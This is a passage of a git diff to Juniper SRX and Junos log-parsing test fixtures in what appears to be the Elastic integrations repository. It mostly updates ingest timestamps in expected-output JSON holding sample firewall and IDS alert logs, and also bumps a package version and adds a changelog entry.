"2021-12-09T13:40:03.197234200Z", + "ingested": "2021-12-14T14:47:24.701240566Z", "original": "\u003c165\u003e1 2012-10-23T17:28:31.696 SRX34001 RT_IDP - IDP_APPDDOS_APP_ATTACK_EVENT_LS [junos@67.43.156.15 epoch-time=\"1419419711\" ddos-application-name=\"Webserver\" source-zone-name=\"trust\" source-interface-name=\"reth3.0\" source-address=\"192.168.14.214\" source-port=\"50825\" destination-zone-name=\"untrust\" destination-interface-name=\"reth0.1\" destination-address=\"172.30.20.201\" destination-port=\"80\" protocol-name=\"TCP\" service-name=\"HTTP\" rule-name=\"1\" ruleebase-name=\"DDOS02\" policy-name=\"AppDoS-Webserver\" repeat-count=\"0\" action=\"NONE\" threat-severity=\"INFO\" connection-hit-rate=\"30\" context-name=\"http-get-url\" context-hit-rate=\"123\" context-value-hit-rate=\"0\" time-scope=\"PEER\" time-count=\"3\" time-period=\"60\" context-value=\"N/A\"]", "kind": "alert", "action": "application_ddos", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json index c97c7b662c6..6c8e5a531ed 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-ids.log-expected.json @@ -79,7 +79,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302494600Z", + "ingested": "2021-12-14T14:47:28.277269090Z", "original": "\u003c11\u003e1 2018-07-19T18:17:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP sweep!\" source-address=\"67.43.156.13\" source-port=\"6000\" destination-address=\"67.43.156.14\" destination-port=\"1433\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "sweep_detected", @@ -167,7 +167,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302518100Z", + "ingested": "2021-12-14T14:47:28.277272744Z", "original": "\u003c11\u003e1 2018-07-19T18:18:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"WinNuke attack!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" source-port=\"3240\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-port=\"139\" source-zone-name=\"untrust\" interface-name=\"fe-0/0/2.0\" action=\"drop\"]", "kind": "alert", "action": "attack_detected", @@ -261,7 +261,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302526500Z", + "ingested": "2021-12-14T14:47:28.277273490Z", "original": "\u003c11\u003e1 2018-07-19T18:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=67.43.156.15\" destination-port=\"50010\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", @@ -355,7 +355,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302615700Z", + "ingested": "2021-12-14T14:47:28.277274175Z", "original": "\u003c11\u003e1 2018-07-19T18:22:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_UDP [junos@67.43.156.15 attack-name=\"UDP flood!\" source-address=\"67.43.156.15\" source-port=\"40001\" destination-address=\"67.43.156.15\" destination-port=\"53\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "flood_detected", @@ -445,7 +445,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302620100Z", + "ingested": "2021-12-14T14:47:28.277274871Z", "original": "\u003c11\u003e1 2018-07-19T18:25:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_ICMP [junos@67.43.156.15 attack-name=\"ICMP fragment!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "fragment_detected", @@ -538,7 +538,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302625500Z", + "ingested": "2021-12-14T14:47:28.277275626Z", "original": "\u003c11\u003e1 2018-07-19T18:26:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Record Route IP option!\" source-address=\"67.43.156.15\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "category": [ @@ -624,7 +624,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302630400Z", + "ingested": "2021-12-14T14:47:28.277276220Z", "original": "\u003c11\u003e1 2018-07-19T18:27:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 6in6!\" source-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" destination-address=\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", @@ -718,7 +718,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302638100Z", + "ingested": "2021-12-14T14:47:28.277276939Z", "original": "\u003c11\u003e1 2018-07-19T18:28:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_IP [junos@67.43.156.15 attack-name=\"Tunnel GRE 4in4!\" source-address=\"67.43.156.13\" destination-address=\"67.43.156.15\" protocol-id=\"1\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "tunneling_screen", @@ -787,7 +787,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302642100Z", + "ingested": "2021-12-14T14:47:28.277277582Z", "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_DST_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" destination-address=67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", @@ -859,7 +859,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302646100Z", + "ingested": "2021-12-14T14:47:28.277278242Z", "original": "\u003c11\u003e1 2018-07-19T19:19:02.309-05:00 rtr199 RT_IDS - RT_SCREEN_TCP_SRC_IP [junos@67.43.156.15 attack-name=\"SYN flood!\" source-address=\"67.43.156.15\" source-zone-name=\"trustZone\" interface-name=\"ge-0/0/1.0\" action=\"alarm-without-drop\"]", "kind": "alert", "action": "flood_detected", @@ -933,7 +933,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302650400Z", + "ingested": "2021-12-14T14:47:28.277278908Z", "original": "\u003c11\u003e1 2020-07-17T09:54:43.912+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"TCP port scan!\" source-address=\"10.1.1.100\" source-port=\"50630\" destination-address=\"10.1.1.1\" destination-port=\"10778\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "scan_detected", @@ -1004,7 +1004,7 @@ }, "event": { "severity": 11, - "ingested": "2021-12-10T10:14:09.302656Z", + "ingested": "2021-12-14T14:47:28.277279898Z", "original": "\u003c11\u003e1 2020-07-17T10:01:43.006+02:00 rtr199 RT_IDS - RT_SCREEN_TCP [junos@67.43.156.15 attack-name=\"FIN but no ACK bit!\" source-address=\"10.1.1.100\" source-port=\"42799\" destination-address=\"10.1.1.1\" destination-port=\"7\" source-zone-name=\"trust\" interface-name=\"ge-0/0/1.0\" action=\"drop\"]", "kind": "alert", "action": "illegal_tcp_flag_detected", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json index d3b6775b120..f5233973993 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-secintel.log-expected.json @@ -77,7 +77,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:13.629278700Z", + "ingested": "2021-12-14T14:47:32.388824965Z", "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"Blacklist\" action=\"BLOCK\" action-detail=\"DROP\" http-host=\"N/A\" threat-severity=\"0\" source-address=\"67.43.156.15\" source-port=\"1\" destination-address=\"10.10.0.10\" destination-port=\"24039\" protocol-id=\"1\" application=\"N/A\" nested-application=\"N/A\" feed-name=\"Tor_Exit_Nodes\" policy-name=\"cc_policy\" profile-name=\"Blacklist\" username=\"N/A\" roles=\"N/A\" session-id-32=\"572564\" source-zone-name=\"Outside\" destination-zone-name=\"DMZ\"]", "kind": "alert", "action": "malware_detected", @@ -178,7 +178,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:13.629290600Z", + "ingested": "2021-12-14T14:47:32.388827014Z", "original": "\u003c14\u003e1 2016-10-17T15:18:11.618Z SRX-1500 RT_SECINTEL - SECINTEL_ACTION_LOG [junos@67.43.156.15 category=\"secintel\" sub-category=\"CC\" action=\"BLOCK\" action-detail=\"CLOSE REDIRECT MSG\" http-host=\"dummy_host\" threat-severity=\"10\" source-address=\"67.43.156.15\" source-port=\"36612\" destination-address=\"10.0.0.1\" destination-port=\"80\" protocol-id=\"6\" application=\"HTTP\" nested-application=\"N/A\" feed-name=\"cc_url_data\" policy-name=\"test\" profile-name=\"test-profile\" username=\"N/A\" roles=\"N/A\" session-id-32=\"502362\" source-zone-name=\"Inside\" destination-zone-name=\"Outside\" occur-count=\"0\"]", "kind": "alert", "action": "malware_detected", diff --git a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json index 5f7fe473bb2..d83fd6e871a 100644 --- a/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json +++ b/packages/juniper/data_stream/srx/_dev/test/pipeline/test-utm.log-expected.json @@ -75,7 +75,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639402800Z", + "ingested": "2021-12-14T14:47:33.324279966Z", "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", @@ -165,7 +165,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639411600Z", + "ingested": "2021-12-14T14:47:33.324282137Z", "original": "\u003c12\u003e1 2016-02-18T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-address=\"10.10.10.50\" source-port=\"1402\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"N/A\" reason=\"BY_OTHER\" profile=\"wf-profile\" url=\"www.checkpoint.com\" obj=\"/css/homepage2012.css\" username=\"user02\" roles=\"N/A\"]", "kind": "event", "category": [ @@ -251,7 +251,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639416300Z", + "ingested": "2021-12-14T14:47:33.324282547Z", "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", @@ -331,7 +331,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639420Z", + "ingested": "2021-12-14T14:47:33.324282893Z", "original": "\u003c12\u003e1 2010-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_SCANNER_DROP_FILE_MT [junos@67.43.156.15 source-address=\"67.43.156.14\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"33578\" filename=\"www.google.com/\" error-code=\"14\" error-message=\"scan engine is not ready\"]", "kind": "event", "category": [ @@ -394,7 +394,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639424500Z", + "ingested": "2021-12-14T14:47:33.324283231Z", "original": "\u003c12\u003e1 2010-01-29T10:59:59.660Z SRX650-1 RT_UTM - AV_HUGE_FILE_DROPPED_MT [junos@67.43.156.15 source-address=\"10.2.1.101\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"51727\" filename=\"10.2.1.101/images/junos- srxsme-10.2-20100106.0-domestic.tgz\"]", "kind": "event", "category": [ @@ -455,7 +455,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639523300Z", + "ingested": "2021-12-14T14:47:33.324283585Z", "original": "\u003c14\u003e1 2016-02-18T01:33:50.391Z utm-srx550-b RT_UTM - ANTISPAM_SPAM_DETECTED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-name=\"N/A\" source-address=\"10.10.10.1\" profile-name=\"antispam01\" action=\"drop\" reason=\"Match local blacklist\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "antispam_filter", @@ -542,7 +542,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639531800Z", + "ingested": "2021-12-14T14:47:33.324283945Z", "original": "\u003c14\u003e1 2016-02-18T01:34:50.391Z utm-srx550-b RT_UTM - CONTENT_FILTERING_BLOCKED_MT [junos@67.43.156.15 source-zone=\"untrust\" destination-zone=\"trust\" protocol=\"http\" source-address=\"192.168.2.3\" source-port=\"58071\" destination-address=\"192.168.100.2\" destination-port=\"80\" profile-name=\"content02\" action=\"drop\" reason=\"blocked due to file extension block list\" username=\"user01@testuser.com\" roles=\"N/A\" filename=\"test.cmd\"]", "kind": "alert", "action": "content_filter", @@ -633,7 +633,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639537600Z", + "ingested": "2021-12-14T14:47:33.324284279Z", "original": "\u003c12\u003e1 2016-02-19T01:32:50.391Z utm-srx550-b RT_UTM - WEBFILTER_URL_BLOCKED_LS [junos@67.43.156.15 source-address=\"192.168.1.100\" source-port=\"58071\" destination-address=\"67.43.156.13\" destination-port=\"80\" category=\"cat1\" reason=\"BY_BLACK_LIST\" profile=\"uf1\" url=\"www.baidu.com\" obj=\"/\" username=\"user01\" roles=\"N/A\"]", "kind": "alert", "action": "web_filter", @@ -722,7 +722,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639541900Z", + "ingested": "2021-12-14T14:47:33.324284629Z", "original": "\u003c12\u003e1 2011-02-08T08:29:28.565Z SRX650-1 RT_UTM - AV_VIRUS_DETECTED_MT_LS [junos@67.43.156.15 source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.103\" destination-port=\"47095\" source-zone-name=\"untrust\" filename=\"www.eicar.org/download/eicar.com\" temporary-filename=\"www.eicar.org/download/eicar.com\" name=\"EICAR-Test-File\" url=\"EICAR-Test-File\"]", "kind": "alert", "action": "virus_detected", @@ -814,7 +814,7 @@ }, "event": { "severity": 14, - "ingested": "2021-12-10T10:14:14.639547300Z", + "ingested": "2021-12-14T14:47:33.324285024Z", "original": "\u003c14\u003e1 2020-07-14T14:16:18.345Z SRX650-1 RT_UTM - WEBFILTER_URL_PERMITTED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"58974\" destination-address=\"67.43.156.14\" destination-port=\"443\" session-id=\"16297\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Information_Technology\" reason=\"BY_SITE_REPUTATION_MODERATELY_SAFE\" profile=\"WCF1\" url=\"datawrapper.dwcdn.net\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"0\"]", "risk_score": 0.0, "kind": "event", @@ -904,7 +904,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639552100Z", + "ingested": "2021-12-14T14:47:33.324285416Z", "original": "\u003c12\u003e1 2020-07-14T14:16:29.541Z SRX650-1 RT_UTM - WEBFILTER_URL_BLOCKED [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"10.1.1.100\" source-port=\"59075\" destination-address=\"67.43.156.13\" destination-port=\"443\" session-id=\"16490\" application=\"UNKNOWN\" nested-application=\"UNKNOWN\" category=\"Enhanced_Advertisements\" reason=\"BY_SITE_REPUTATION_SUSPICIOUS\" profile=\"WCF1\" url=\"dsp.adfarm1.adition.com\" obj=\"/\" username=\"N/A\" roles=\"N/A\" application-sub-category=\"N/A\" urlcategory-risk=\"3\"]", "risk_score": 3.0, "kind": "alert", @@ -993,7 +993,7 @@ }, "event": { "severity": 12, - "ingested": "2021-12-10T10:14:14.639558300Z", + "ingested": "2021-12-14T14:47:33.324285896Z", "original": "\u003c12\u003e1 2020-07-14T14:17:04.733Z SRX650-1 RT_UTM - AV_FILE_NOT_SCANNED_DROPPED_MT [junos@67.43.156.15 source-zone=\"trust\" destination-zone=\"untrust\" source-address=\"67.43.156.13\" source-port=\"80\" destination-address=\"10.1.1.100\" destination-port=\"58954\" profile-name=\"Custom-Sophos-Profile\" filename=\"download.cdn.mozilla.net/pub/firefox/releases/78.0.2/update/win64/de/firefox-78.0.2.complete.mar\" action=\"BLOCKED\" reason=\"exceeding maximum content size\" error-code=\"7\" username=\"N/A\" roles=\"N/A\"]", "kind": "event", "category": [ diff --git a/packages/juniper/manifest.yml b/packages/juniper/manifest.yml index aeb4b4f0c3d..4bc71c38892 100644 --- a/packages/juniper/manifest.yml +++ b/packages/juniper/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: juniper title: Juniper Logs -version: 1.0.6 +version: 1.0.7 description: Deprecated. Use a specific Juniper package instead. categories: ["network", "security"] release: ga diff --git a/packages/juniper_junos/changelog.yml b/packages/juniper_junos/changelog.yml index 8b82f05b0bf..f745a9029fb 100644 --- a/packages/juniper_junos/changelog.yml +++ b/packages/juniper_junos/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.0.2" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.0.1" changes: - description: Initial release of new package split from oroginal Juniper package diff --git a/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json b/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json index 5bebbe50510..0bacf5bcc33 100644 --- a/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/juniper_junos/data_stream/log/_dev/test/pipeline/test-generated.log-expected.json @@ -3,7 +3,7 @@ { "message": "Jan 29 06:09:59 ceroinBC.exe[6713]: RPD_SCHED_TASK_LONGRUNTIME: : exe ran for 7309(5049)", "event": { - "ingested": "2021-11-22T13:01:58.803536119Z" + "ingested": "2021-12-14T14:48:05.090706664Z" }, "ecs": { "version": "1.12.0" @@ -15,7 +15,7 @@ { "message": "Feb 12 13:12:33 DCD_FILTER_LIB_ERROR message repeated [7608]: llu: Filter library initialization failed", "event": { - "ingested": "2021-11-22T13:01:58.803552611Z" + "ingested": "2021-12-14T14:48:05.090709611Z" }, "ecs": { "version": "1.12.0" @@ -27,7 +27,7 @@ { "message": "Feb 26 20:15:08 MIB2D_TRAP_SEND_FAILURE: restart [6747]: sum: uaerat: cancel: success", "event": { - "ingested": "2021-11-22T13:01:58.803555368Z" + "ingested": "2021-12-14T14:48:05.090710155Z" }, "ecs": { "version": "1.12.0" @@ -39,7 +39,7 @@ { "message": "Mar 12 03:17:42 seq olorema6148.www.localdomain: fug5500.www.domain IFP trace\u003e node: dqu", "event": { - "ingested": "2021-11-22T13:01:58.803557763Z" + "ingested": "2021-12-14T14:48:05.090710581Z" }, "ecs": { "version": "1.12.0" @@ -51,7 +51,7 @@ { "message": "Mar 26 10:20:16 ssb SNMPD_CONTEXT_ERROR: [7400]: emq: isiu: success in 6237 context 5367", "event": { - "ingested": "2021-11-22T13:01:58.803560166Z" + "ingested": "2021-12-14T14:48:05.090710959Z" }, "ecs": { "version": "1.12.0" @@ -63,7 +63,7 @@ { "message": "Apr 9 17:22:51 RPD_KRT_IFL_CELL_RELAY_MODE_UNSPECIFIED: restart [7618]: ionul: ifl : nibus, unknown", "event": { - "ingested": "2021-11-22T13:01:58.803562516Z" + "ingested": "2021-12-14T14:48:05.090711366Z" }, "ecs": { "version": "1.12.0" @@ -75,7 +75,7 @@ { "message": "Apr 24 00:25:25 CHASSISD_SNMP_TRAP10 message repeated [1284]: ume: SNMP trap: failure: ono", "event": { - "ingested": "2021-11-22T13:01:58.803565Z" + "ingested": "2021-12-14T14:48:05.090711746Z" }, "ecs": { "version": "1.12.0" @@ -87,7 +87,7 @@ { "message": "May 8 07:27:59 sunt prehen6218.www.localhost: onse.exe[254]: RPD_KRT_IFL_CELL_RELAY_MODE_INVALID: : ifl : inibusBo, failure", "event": { - "ingested": "2021-11-22T13:01:58.803567406Z" + "ingested": "2021-12-14T14:48:05.090712147Z" }, "ecs": { "version": "1.12.0" @@ -99,7 +99,7 @@ { "message": "May 22 14:30:33 iamquis quirat6972.www5.lan: isc.exe[3237]: SNMPD_USER_ERROR: : conseq: unknown in 6404 user 'atiset' 4068", "event": { - "ingested": "2021-11-22T13:01:58.803569782Z" + "ingested": "2021-12-14T14:48:05.090712534Z" }, "ecs": { "version": "1.12.0" @@ -111,7 +111,7 @@ { "message": "Jun 5 21:33:08 fpc9 RPD_TASK_REINIT: [4621]: lita: Reinitializing", "event": { - "ingested": "2021-11-22T13:01:58.803572156Z" + "ingested": "2021-12-14T14:48:05.090712924Z" }, "ecs": { "version": "1.12.0" @@ -123,7 +123,7 @@ { "message": "Jun 20 04:35:42 fpc4 LOGIN_FAILED: [2227]: oinBC: Login failed for user quameius from host ipsumdol4488.api.localdomain", "event": { - "ingested": "2021-11-22T13:01:58.803574504Z" + "ingested": "2021-12-14T14:48:05.090713343Z" }, "ecs": { "version": "1.12.0" @@ -135,7 +135,7 @@ { "message": "Jul 4 11:38:16 NASD_PPP_SEND_PARTIAL: restart [3994]: aper: Unable to send all of message: santiumd", "event": { - "ingested": "2021-11-22T13:01:58.803577165Z" + "ingested": "2021-12-14T14:48:05.090713968Z" }, "ecs": { "version": "1.12.0" @@ -147,7 +147,7 @@ { "message": "Jul 18 18:40:50 UI_COMMIT_AT_FAILED message repeated [7440]: temqu: success, minimav", "event": { - "ingested": "2021-11-22T13:01:58.803579569Z" + "ingested": "2021-12-14T14:48:05.090714382Z" }, "ecs": { "version": "1.12.0" @@ -159,7 +159,7 @@ { "message": "Aug 2 01:43:25 rnatur ofdeFin7811.lan: emipsumd.exe[5020]: BOOTPD_NEW_CONF: : New configuration installed", "event": { - "ingested": "2021-11-22T13:01:58.803581945Z" + "ingested": "2021-12-14T14:48:05.090714765Z" }, "ecs": { "version": "1.12.0" @@ -171,7 +171,7 @@ { "message": "Aug 16 08:45:59 RPD_RIP_JOIN_MULTICAST message repeated [60]: onemulla: Unable to join multicast group enp0s4292: unknown", "event": { - "ingested": "2021-11-22T13:01:58.803584298Z" + "ingested": "2021-12-14T14:48:05.090715159Z" }, "ecs": { "version": "1.12.0" @@ -183,7 +183,7 @@ { "message": "Aug 30 15:48:33 FSAD_TERMINATED_CONNECTION: restart [6703]: xea: Open file ites` closed due to unknown", "event": { - "ingested": "2021-11-22T13:01:58.803586650Z" + "ingested": "2021-12-14T14:48:05.090715556Z" }, "ecs": { "version": "1.12.0" @@ -195,7 +195,7 @@ { "message": "Sep 13 22:51:07 RPD_KRT_IFL_GENERATION message repeated [5539]: eri: ifl lo2169 generation mismatch -- unknown", "event": { - "ingested": "2021-11-22T13:01:58.803589125Z" + "ingested": "2021-12-14T14:48:05.090716077Z" }, "ecs": { "version": "1.12.0" @@ -207,7 +207,7 @@ { "message": "Sep 28 05:53:42 cfeb UI_COMMIT_ROLLBACK_FAILED: [3453]: avolu: Automatic rollback failed", "event": { - "ingested": "2021-11-22T13:01:58.803591489Z" + "ingested": "2021-12-14T14:48:05.090716491Z" }, "ecs": { "version": "1.12.0" @@ -219,7 +219,7 @@ { "message": "Oct 12 12:56:16 mquisn.exe[3993]: RMOPD_usage : failure: midest", "event": { - "ingested": "2021-11-22T13:01:58.803593856Z" + "ingested": "2021-12-14T14:48:05.090716877Z" }, "ecs": { "version": "1.12.0" @@ -231,7 +231,7 @@ { "message": "Oct 26 19:58:50 undeomni.exe[4938]: RPD_ISIS_LSPCKSUM: : IS-IS 715 LSP checksum error, interface enp0s1965, LSP id tasun, sequence 3203, checksum eratv, lifetime ipsa", "event": { - "ingested": "2021-11-22T13:01:58.803596248Z" + "ingested": "2021-12-14T14:48:05.090717268Z" }, "ecs": { "version": "1.12.0" @@ -243,7 +243,7 @@ { "message": "Nov 10 03:01:24 kmd: restart ", "event": { - "ingested": "2021-11-22T13:01:58.803598606Z" + "ingested": "2021-12-14T14:48:05.090717660Z" }, "ecs": { "version": "1.12.0" @@ -255,7 +255,7 @@ { "message": "Nov 24 10:03:59 ever.exe[6463]: LOGIN_FAILED: : Login failed for user atq from host erspi4926.www5.test", "event": { - "ingested": "2021-11-22T13:01:58.803600938Z" + "ingested": "2021-12-14T14:48:05.090718047Z" }, "ecs": { "version": "1.12.0" @@ -267,7 +267,7 @@ { "message": "Dec 8 17:06:33 CHASSISD_MBUS_ERROR message repeated [72]: iadese: nisiu imad: management bus failed sanity test", "event": { - "ingested": "2021-11-22T13:01:58.803603292Z" + "ingested": "2021-12-14T14:48:05.090718439Z" }, "ecs": { "version": "1.12.0" @@ -279,7 +279,7 @@ { "message": "Dec 23 00:09:07 niamquis.exe[1471]: TFTPD_NAK_ERR : nak error ptatems, 357", "event": { - "ingested": "2021-11-22T13:01:58.803605750Z" + "ingested": "2021-12-14T14:48:05.090718947Z" }, "ecs": { "version": "1.12.0" @@ -291,7 +291,7 @@ { "message": "Jan 6 07:11:41 UI_DUPLICATE_UID: restart [3350]: atqu: Users naturau have the same UID olorsita", "event": { - "ingested": "2021-11-22T13:01:58.803608075Z" + "ingested": "2021-12-14T14:48:05.090719340Z" }, "ecs": { "version": "1.12.0" @@ -303,7 +303,7 @@ { "message": "Jan 20 14:14:16 piscivel.exe[4753]: TFTPD_CREATE_ERR: : check_space unknown", "event": { - "ingested": "2021-11-22T13:01:58.803610506Z" + "ingested": "2021-12-14T14:48:05.090719726Z" }, "ecs": { "version": "1.12.0" @@ -315,7 +315,7 @@ { "message": "Feb 3 21:16:50 fpc4 RPD_START: [1269]: riat: Start 181 version version built 7425", "event": { - "ingested": "2021-11-22T13:01:58.803612935Z" + "ingested": "2021-12-14T14:48:05.090720110Z" }, "ecs": { "version": "1.12.0" @@ -327,7 +327,7 @@ { "message": "Feb 18 04:19:24 fpc2 COSMAN: : uptasnul: delete class_to_ifl table 2069, ifl 3693", "event": { - "ingested": "2021-11-22T13:01:58.803615330Z" + "ingested": "2021-12-14T14:48:05.090720500Z" }, "ecs": { "version": "1.12.0" @@ -339,7 +339,7 @@ { "message": "Mar 4 11:21:59 orum oinBCSed3073.www.lan: ilm.exe[3193]: SNMPD_TRAP_QUEUE_MAX_ATTEMPTS: : fugiatqu: after 4003 attempts, deleting 4568 traps queued to exercita", "event": { - "ingested": "2021-11-22T13:01:58.803617707Z" + "ingested": "2021-12-14T14:48:05.090720886Z" }, "ecs": { "version": "1.12.0" @@ -351,7 +351,7 @@ { "message": "Mar 18 18:24:33 TFTPD_BIND_ERR: restart [1431]: ntut: bind: failure", "event": { - "ingested": "2021-11-22T13:01:58.803620161Z" + "ingested": "2021-12-14T14:48:05.090721286Z" }, "ecs": { "version": "1.12.0" @@ -363,7 +363,7 @@ { "message": "Apr 2 01:27:07 lite ugia517.api.host: doei.exe[7073]: RPD_LDP_SESSIONDOWN: : LDP session 10.88.126.165 is down, failure", "event": { - "ingested": "2021-11-22T13:01:58.803622548Z" + "ingested": "2021-12-14T14:48:05.090721673Z" }, "ecs": { "version": "1.12.0" @@ -375,7 +375,7 @@ { "message": "Apr 16 08:29:41 fpc6 SNMPD_CONTEXT_ERROR: [180]: eturadip: ent: unknown in 5848 context 316", "event": { - "ingested": "2021-11-22T13:01:58.803624951Z" + "ingested": "2021-12-14T14:48:05.090722060Z" }, "ecs": { "version": "1.12.0" @@ -387,7 +387,7 @@ { "message": "Apr 30 15:32:16 NASD_CHAP_INVALID_CHAP_IDENTIFIER message repeated [796]: iumdo: lo2721: received aturv expected CHAP ID: ectetura", "event": { - "ingested": "2021-11-22T13:01:58.803627334Z" + "ingested": "2021-12-14T14:48:05.090722468Z" }, "ecs": { "version": "1.12.0" @@ -399,7 +399,7 @@ { "message": "May 14 22:34:50 UI_LOAD_EVENT message repeated [6342]: seq: User 'moll' is performing a 'allow'", "event": { - "ingested": 